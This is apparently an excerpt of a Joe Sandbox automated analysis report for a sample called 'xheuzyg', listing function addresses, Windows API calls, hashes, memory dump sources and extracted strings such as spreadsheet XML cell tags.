Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: f3a3ad85105ffebee78f518ea01550f44cd43350b7814b21bf6482656e03ad1e
Instruction ID: 8c2585c0db506468a95fa83b71f080d1e4ee7ab9d90a88634665e19699ad68d5
Opcode Fuzzy Hash: f3a3ad85105ffebee78f518ea01550f44cd43350b7814b21bf6482656e03ad1e
Instruction Fuzzy Hash: 7721B072619206ABEF28AE69DC62FBA37A8EF74710B14007EF902C6141EB74ED40C750

Uniqueness

Uniqueness Score: -1.00%

Function 001C4906 Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

EnumSystemLocalesW.KERNEL32(001C4A2C,00000001,00000000,?,-00000050,?,001C5060,00000000,?,?,?,00000055,?), ref: 001C4978

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: bfbde90d769f8d97b8281ab37597bfca1f6fea1c70093a27c3ce1da0fffd9a31
Instruction ID: 15652d3dae73d6d6826918ebf5770d774f61a4b0ecc2afd16086ae547f0ec786
Opcode Fuzzy Hash: bfbde90d769f8d97b8281ab37597bfca1f6fea1c70093a27c3ce1da0fffd9a31
Instruction Fuzzy Hash: E5110C372087059FDB189F39D8A1ABABB91FF94359B14452CE94787A40D371F942C740

Uniqueness

Uniqueness Score: -1.00%

Function 001C4EAE Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,001C4C48,00000000,00000000,?), ref: 001C4EDA

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 820e16986045742921da54341879fc1fb4e6dd5c9a4efbbffa09b79a14c27886
Instruction ID: ec6efb2cd92438c7bf567da7637f46ee6c8a0b2c1f59ee7b379cef4e55643d1c
Opcode Fuzzy Hash: 820e16986045742921da54341879fc1fb4e6dd5c9a4efbbffa09b79a14c27886
Instruction Fuzzy Hash: D601F932608116ABDF2C9A69CC16FFE3768EB51754F16442CED07A3580EB74FE41C6A4

Uniqueness

Uniqueness Score: -1.00%

Function 001C49A1 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

EnumSystemLocalesW.KERNEL32(001C4C7F,00000001,?,?,-00000050,?,001C5028,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 001C49EB

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: ea8f1a0d9eb710ed09e74380dc3eeff9e2f0c3c0916d7e7ca56b66d125eaec8e
Instruction ID: 39f5fa8b866208c7a75942703200d0b9a6b3f99f4002ed22fbfd185e2d95a969
Opcode Fuzzy Hash: ea8f1a0d9eb710ed09e74380dc3eeff9e2f0c3c0916d7e7ca56b66d125eaec8e
Instruction Fuzzy Hash: 7DF0C2362083045FDB249F3AD8D1F6A7BA1EF95368B15452CF9468BA90C7B1DC42C614

Uniqueness

Uniqueness Score: -1.00%

Function 001BC9CF Relevance: 1.5, APIs: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001B6866: EnterCriticalSection.KERNEL32(?,?,001B7D90,00000000,001D8378,0000000C,001B7D58,?,?,001B6C5E,?,?,?,001BB51A,00000001,00000364), ref: 001B6875

EnumSystemLocalesW.KERNEL32(001BC9C2,00000001,001D8640,0000000C,001BCDF7,00000000), ref: 001BCA07

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 4ac6106c0d0b70df3b6c5a260a6c0607d765545d17dc773ef069aa01905545bd
Instruction ID: 8bfaddd8caa0cda6ab982bad300075cc775211ef88c08e0d20d1618b2f42a5b2
Opcode Fuzzy Hash: 4ac6106c0d0b70df3b6c5a260a6c0607d765545d17dc773ef069aa01905545bd
Instruction Fuzzy Hash: 1DF04F76A15204DFDB00EF68E942B9D7BF0FB14B25F00422AF511D7390CB7589408F81

Uniqueness

Uniqueness Score: -1.00%

Function 001C48BB Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001BB37C: GetLastError.KERNEL32(00000000,?,001BF0C9), ref: 001BB380
Part of subcall function 001BB37C: SetLastError.KERNEL32(00000000,00000000,?,00000006,000000FF), ref: 001BB422

EnumSystemLocalesW.KERNEL32(001C4814,00000001,?,?,?,001C5082,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 001C48F2

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 5a188921246ec864009c1f12d5dfeb5fa6e8024ad02d8639828e2490ffeefd05
Instruction ID: 277ee5e59acfbc6855230db5d74a0ebcee828043dfe1d1b814db7cf3abea9a61
Opcode Fuzzy Hash: 5a188921246ec864009c1f12d5dfeb5fa6e8024ad02d8639828e2490ffeefd05
Instruction Fuzzy Hash: C2F0553630024997CB049F79D855F6A7F90FFC1754B0A405CEA058B650C371D882C750

Uniqueness

Uniqueness Score: -1.00%

Function 001BCEFB Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,001BA237,?,20001004,00000000,00000002,?,?,001B9829), ref: 001BCF2F

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 856119147109bdbfd3188271b3da3e578ca1592fa1c414f9696e0c3225599f2f
Instruction ID: 177df21f3258cd4378f5ca6bbbfbbccf9b9e0283267ef7a334d1673a9cc20a80
Opcode Fuzzy Hash: 856119147109bdbfd3188271b3da3e578ca1592fa1c414f9696e0c3225599f2f
Instruction Fuzzy Hash: B9E04F3150422CBBCF126F61DC0CEEE3F16EF84750F044014FC0566120DB768961AAD5

Uniqueness

Uniqueness Score: -1.00%

Function 001B0987 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00010993,001B052D), ref: 001B098C

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: deaf2a7635e0e31f8206e6097f2dafbccada397ff333287c93f3add80c50e30f
Instruction ID: d26afa1161dedf2c875f89faa90ff3a65903f2fb99599320a6a2a997add2bd88
Opcode Fuzzy Hash: deaf2a7635e0e31f8206e6097f2dafbccada397ff333287c93f3add80c50e30f
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 001BE682 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 001BE682

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 07ea48942c085038ee52afdc05949c77fc22a7de2ed4d101839a950c80aee6ea
Instruction ID: fc6637427ecfc9151965054d80e6e4e0e328c5b66b78d865d7ac8ade25d9f0dd
Opcode Fuzzy Hash: 07ea48942c085038ee52afdc05949c77fc22a7de2ed4d101839a950c80aee6ea
Instruction Fuzzy Hash: 3CA01230106104CB43004F31590420C3A947F001D47014019A401C0520DF2480905601

Uniqueness

Uniqueness Score: -1.00%

Function 0138017B Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction ID: f14dd60b083a4bb03086c76e3351a5d4ed3faccd9a1e09b65c263c69f4036308
Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
Instruction Fuzzy Hash: B111A536610219AFDB20EF6DC890DAEB7E9EF546A87448015FC55CB310E334ED85C754

Uniqueness

Uniqueness Score: -1.00%

Function 0138013E Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction ID: 0dde9b4c46367b8609694b68e737589d02d2f98930a5191ee3632a0d2c488f75
Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
Instruction Fuzzy Hash: ECE01A39665649EFDB48DBACCD81D65B3F8EB09234B144290F925C77A0E634EE04DA50

Uniqueness

Uniqueness Score: -1.00%

Function 01380109 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction ID: 29f8c4897325b9757ef6347d42fd54f3959fbc0e7886140cf69a45f25bd374ec
Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
Instruction Fuzzy Hash: 9FE0863B2107149BC775AB5DC840D96F7E8EF886B0B4A4425FD4997610C330FC05C790

Uniqueness

Uniqueness Score: -1.00%

Function 0138005F Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1230484201.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1380000_xheuzyg.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40

Uniqueness

Uniqueness Score: -1.00%

Function 001C6D0B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 001C69C1: CreateFileW.KERNEL32(?,00000000,?,001C6DB4,?,?,00000000,?,001C6DB4,?,0000000C), ref: 001C69DE

GetLastError.KERNEL32 ref: 001C6E1F
__dosmaperr.LIBCMT ref: 001C6E26
GetFileType.KERNEL32(00000000), ref: 001C6E32
GetLastError.KERNEL32 ref: 001C6E3C
__dosmaperr.LIBCMT ref: 001C6E45
CloseHandle.KERNEL32(00000000), ref: 001C6E65
CloseHandle.KERNEL32(001BE51F), ref: 001C6FB2
GetLastError.KERNEL32 ref: 001C6FE4
__dosmaperr.LIBCMT ref: 001C6FEB

Strings

H, xrefs: 001C6F70

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
Instruction ID: 9633f124ea54769ff564c0340860c861f182b8c755d8d5d09d6519315a9ebdce
Opcode Fuzzy Hash: 4da72346ae443ec75766c92104349d08862b96c1276b8aa15f546d6b2dc18308
Instruction Fuzzy Hash: 84A12436A041549FCF1DEF68DCA1FAE3BA1AB26324F18015EF8429F291CB35D852CB51

Uniqueness

Uniqueness Score: -1.00%

Function 001A1A9F Relevance: 13.7, APIs: 9, Instructions: 160memorycomsleepCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001A1AB4
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1B03
CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1B1C
VariantInit.OLEAUT32(?), ref: 001A1B27
SysAllocString.OLEAUT32(00000000), ref: 001A1B62
VariantInit.OLEAUT32(?), ref: 001A1B9A
SysAllocString.OLEAUT32(00000000), ref: 001A1BD5
Sleep.KERNEL32(00000064), ref: 001A1C20
CoUninitialize.OLE32 ref: 001A1C4B

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AllocInitStringVariant$CreateInitializeInstanceIos_base_dtorSleepUninitializestd::ios_base::_
String ID:
API String ID: 2419184378-0
Opcode ID: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
Instruction ID: f184d25663381d68ad48b11e1fb41a3230ba730dc155ca10a042dfd5d94488b7
Opcode Fuzzy Hash: 669ed720f99a6ac319ed7382651b719b88ade67629386f05f6c4cc7dd3f42ddd
Instruction Fuzzy Hash: B0514C71204305AFD714EF64D885E6BB7B9FF8A704F400A5CF5468B291DB71E849CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 001C88E1 Relevance: 12.2, APIs: 8, Instructions: 248COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(013F17E0,013F17E0,?,7FFFFFFF,?,001C8BB1,013F17E0,013F17E0,?,013F17E0,?,?,?,?,013F17E0,?), ref: 001C8987
__alloca_probe_16.LIBCMT ref: 001C8A42
__alloca_probe_16.LIBCMT ref: 001C8AD1
__freea.LIBCMT ref: 001C8B1C
__freea.LIBCMT ref: 001C8B22
__freea.LIBCMT ref: 001C8B58
__freea.LIBCMT ref: 001C8B5E
__freea.LIBCMT ref: 001C8B6E

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: __freea$__alloca_probe_16$Info
String ID:
API String ID: 127012223-0
Opcode ID: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
Instruction ID: ad2ffe81e2f9d95336686e06931725e71fbc79929b7499f8ce494d730019cf44
Opcode Fuzzy Hash: 790e8278454c874c6e1b7b818521280bd0321a3f7d6b48735a15d4f0365b0218
Instruction Fuzzy Hash: A971D5B2900205AFDF259EA48CC2FFE77A99FA9714F29005EE805A7281DF35DC4187A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A1961 Relevance: 10.6, APIs: 7, Instructions: 132memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 001A1970
CoCreateInstance.OLE32(001CA2E0,00000000,00000017,001CA2D0,?), ref: 001A1988
VariantInit.OLEAUT32(?), ref: 001A1992
SysAllocString.OLEAUT32(00000000), ref: 001A19CB
VariantInit.OLEAUT32(?), ref: 001A19FD
SysAllocString.OLEAUT32(00000000), ref: 001A1A36
CoUninitialize.OLE32(?,?,?), ref: 001A1A90

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: AllocInitStringVariant$CreateInitializeInstanceUninitialize
String ID:
API String ID: 1094765775-0
Opcode ID: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
Instruction ID: be2216e1e28a6b830731a4fe1d631fd6daf75731b25f79ca04a5eaf67196f2e3
Opcode Fuzzy Hash: b37a03a8125266cc9358b9b714ea8d2c2db3fb5994094a8382a307e4523fb425
Instruction Fuzzy Hash: C341A171A10218EFCF04DFA4D889EAEB7B9FF49304F400558F502AB291CB71A945CB91

Uniqueness

Uniqueness Score: -1.00%

Function 001A1E58 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 127COMMON

Download Yara Rule

APIs

Part of subcall function 001AE4D9: __EH_prolog.LIBCMT ref: 001AE4DE

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FBD
std::ios_base::_Ios_base_dtor.LIBCPMT ref: 001A1FEB

Strings

Modified Value, xrefs: 001A1F2C, 001A1F3F
<v>, xrefs: 001A1EFA, 001A1EFF, 001A1F08
<c r="A1">, xrefs: 001A1EDA, 001A1EDF, 001A1EE9
</v>, xrefs: 001A1F12, 001A1F19, 001A1F22

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: Ios_base_dtorstd::ios_base::_$H_prolog
String ID: </v>$<c r="A1">$<v>$Modified Value
API String ID: 997254673-4044373161
Opcode ID: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
Instruction ID: fec37011940da06f0428c5bbc8cafd88763dad5c141426fb38f21cf82540378a
Opcode Fuzzy Hash: ea864a15c742e1b69ba63a52fc8888e8fe0bef427e99f0366f3f0d8fc9342e53
Instruction Fuzzy Hash: CD41C9765083416EC324E734DC86FAFB7E8AF96350F00492CF58A97191EB309D09C792

Uniqueness

Uniqueness Score: -1.00%

Function 001B26EE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 104COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,?,?,?,?,?,?,001D81BC,19930522,00000000,1FFFFFFF), ref: 001B2715
_CallSETranslator.LIBVCRUNTIME ref: 001B2748
_GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 001B2771

Strings

RCC, xrefs: 001B272F
$, xrefs: 001B2705
MOC, xrefs: 001B2727

Memory Dump Source

Source File: 00000002.00000002.1230293998.00000000001A1000.00000020.00000001.01000000.00000004.sdmp, Offset: 001A0000, based on PE: true

Associated: 00000002.00000002.1230218728.00000000001A0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230311449.00000000001CA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230327147.00000000001DA000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230337847.00000000001DC000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1230348185.00000000001DE000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_1a0000_xheuzyg.jbxd

Similarity

API ID: CallCheckEncodePointerRangeTranslatorTrys
String ID: MOC$RCC$$
API String ID: 877623402-3012946005
Opcode ID: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
Instruction ID: 09494e80c6b68a5067d3dda98230aabd110c5fc975896249ecbd69ad5805b711
Opcode Fuzzy Hash: 949fa102d6a7b4d938dadf452ca71da23812b5c9fad8425ae9dabb40fadd47c4
Instruction Fuzzy Hash: 6C41B932500249AFDF11CF44C885EEEB7AAEF68314F288588FE0467251CB34ED95CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001BCB9C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,297D850E,?,001BCCAB,?,?,00000000), ref: 001BCC5D

Strings

ext-ms-, xrefs: 001BCC07
api-ms-, xrefs: 001BCBF3

